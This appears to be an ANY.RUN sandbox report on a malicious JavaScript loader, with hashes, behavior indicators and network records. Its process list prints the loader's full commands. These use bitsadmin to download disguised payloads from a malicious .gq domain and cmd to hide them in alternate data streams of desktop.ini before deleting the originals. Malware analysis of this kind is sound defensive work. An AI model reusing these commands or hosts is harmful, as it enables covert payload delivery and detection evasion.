File name:

bmd7i29.JS

Full analysis: https://app.any.run/tasks/ba44468c-a9ba-4a59-8305-1ef465c945b9
Verdict: Malicious activity
Analysis date: November 21, 2019, 16:41:52
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MIME: text/plain
File info: ASCII text, with no line terminators
MD5:

12E8BA05EFFEA4B55613C16B1439986F

SHA1:

BA1B7B7BB7C4E028C0F392C1EF19B58569DBAC7B

SHA256:

2C7FA3A8BCC108185DA9F9CB9C4218578FA30CF03CA9A8FEA3379CB89374FB77

SSDEEP:

3:YYGRacVpKjnAMHW6MdMI5sF:5rkpKjWdDw

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes settings of System certificates

      • WScript.exe (PID: 1412)

    • Uses BITADMIN.EXE for downloading application

      • WScript.exe (PID: 1412)

  • SUSPICIOUS

    • Adds / modifies Windows certificates

      • WScript.exe (PID: 1412)

    • Creates files in the user directory

      • WScript.exe (PID: 1412)

    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 1412)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.bs/bin | PrintFox (C64) bitmap (100)
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
55
Monitored processes
12
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1412"C:\Windows\System32\WScript.exe" "C:\Users\admin\Downloads\bmd7i29.JS"C:\Windows\System32\WScript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.8.7600.16385
388"C:\Windows\System32\bitsadmin.exe" /transfer 15302 /priority foreground https://t3eiyui93at8.admi2939vcu94.gq/?04/lpquayevvta.jpg.zip C:\Users\Public\Libraries\yanki\lpquayevvta.jpgC:\Windows\System32\bitsadmin.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
2147954557
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
2200"C:\Windows\System32\cmd.exe" /c type "C:\Users\Public\Libraries\yanki\lpquayevvta.jpg" > "C:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvta.jpg"&&erase "C:\Users\Public\Libraries\yanki\lpquayevvta.jpg"C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3324"C:\Windows\System32\bitsadmin.exe" /transfer 75668 /priority foreground https://t3eiyui93at8.admi2939vcu94.gq/?04/lpquayevvtb.jpg.zip C:\Users\Public\Libraries\yanki\lpquayevvtb.jpgC:\Windows\System32\bitsadmin.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
2428"C:\Windows\System32\cmd.exe" /c type "C:\Users\Public\Libraries\yanki\lpquayevvtb.jpg" > "C:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvtb.jpg"&&erase "C:\Users\Public\Libraries\yanki\lpquayevvtb.jpg"C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3788"C:\Windows\System32\bitsadmin.exe" /transfer 75635 /priority foreground https://t3eiyui93at8.admi2939vcu94.gq/?04/lpquayevvtc.jpg.zip C:\Users\Public\Libraries\yanki\lpquayevvtc.jpgC:\Windows\System32\bitsadmin.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
2496"C:\Windows\System32\cmd.exe" /c type "C:\Users\Public\Libraries\yanki\lpquayevvtc.jpg" > "C:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvtc.jpg"&&erase "C:\Users\Public\Libraries\yanki\lpquayevvtc.jpg"C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2748"C:\Windows\System32\bitsadmin.exe" /transfer 58255 /priority foreground https://t3eiyui93at8.admi2939vcu94.gq/?04/lpquayevvtdwwn.gif.zip C:\Users\Public\Libraries\yanki\lpquayevvtdwwn.gifC:\Windows\System32\bitsadmin.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
2928"C:\Windows\System32\cmd.exe" /c type "C:\Users\Public\Libraries\yanki\lpquayevvtdwwn.gif" > "C:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvtdwwn.gif"&&erase "C:\Users\Public\Libraries\yanki\lpquayevvtdwwn.gif"C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3540"C:\Windows\System32\bitsadmin.exe" /transfer 23221 /priority foreground https://t3eiyui93at8.admi2939vcu94.gq/?04/lpquayevvtdx.gif.zip C:\Users\Public\Libraries\yanki\lpquayevvtdx.gifC:\Windows\System32\bitsadmin.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Total events
179
Read events
143
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
3332cmd.exeC:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvtdx.gifbinary
MD5:420CA9F3B004FB712BB65FCEF471E528
SHA256:963B620478D180D7CFB7951D997D8FE55F73BB8C04ECA7CA5944E1D20B0271F5
2496cmd.exeC:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvtc.jpgbinary
MD5:22BF214121CFB0107CD5642995B62AE2
SHA256:6A75F5C9D9A05025A5BBFBB3F328AA1B533B8F263E081FAAE6AF5621EE773164
1412WScript.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txttext
MD5:388CC579231FB9A55E1F7F5A7ECCA726
SHA256:76D1AC39A8C631633581D2CFCB6364C61881F686F32BAC230BD99CC954566F25
2928cmd.exeC:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvtdwwn.gifbinary
MD5:5B1B26B50C386467713C19DFADB6E5D7
SHA256:F7145CD84BBB76FE5AEC655680781E3000B56343091D2313D205D1DBA798F49D
2428cmd.exeC:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvtb.jpgbinary
MD5:F2CF0BC2A11C62AFA0FD80A3E8CD704D
SHA256:C7F2327AF387BE23D5A6FC7FA9DDC0CA6E7BE180F0588440BE9C3EFCA04A1AAC
1412WScript.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\wwa5tur9iae3_00rr32jwi949ikrfm77_ml[1].txtxml
MD5:64922403CB5BA44BCA4AA2F972A8A166
SHA256:957EE6033CE0E9227C023014EE13AB4AC0D184A0B64DCB8398531291EC20A7B8
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
5
DNS requests
3
Threats
4

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
104.28.21.40:443
t3eiyui93at8.admi2939vcu94.gq
Cloudflare Inc
US
malicious
1412
WScript.exe
104.18.37.173:443
wwa5tur9iae3.00rr32jwi949ikrfm77.ml
Cloudflare Inc
US
suspicious

DNS requests

Domain
IP
Reputation
wwa5tur9iae3.00rr32jwi949ikrfm77.ml
  • 104.18.37.173
  • 104.18.36.173
suspicious
t3eiyui93at8.admi2939vcu94.gq
  • 104.28.21.40
  • 104.28.20.40
malicious

Threats

PID
Process
Class
Message
1080
svchost.exe
Potentially Bad Traffic
ET INFO DNS Query for Suspicious .ml Domain
1412
WScript.exe
Potentially Bad Traffic
ET INFO Suspicious Domain (*.ml) in TLS SNI
1080
svchost.exe
Potentially Bad Traffic
ET INFO DNS Query for Suspicious .gq Domain
Potentially Bad Traffic
ET INFO Suspicious Domain (*.gq) in TLS SNI
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2023 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
bmd7i29.JS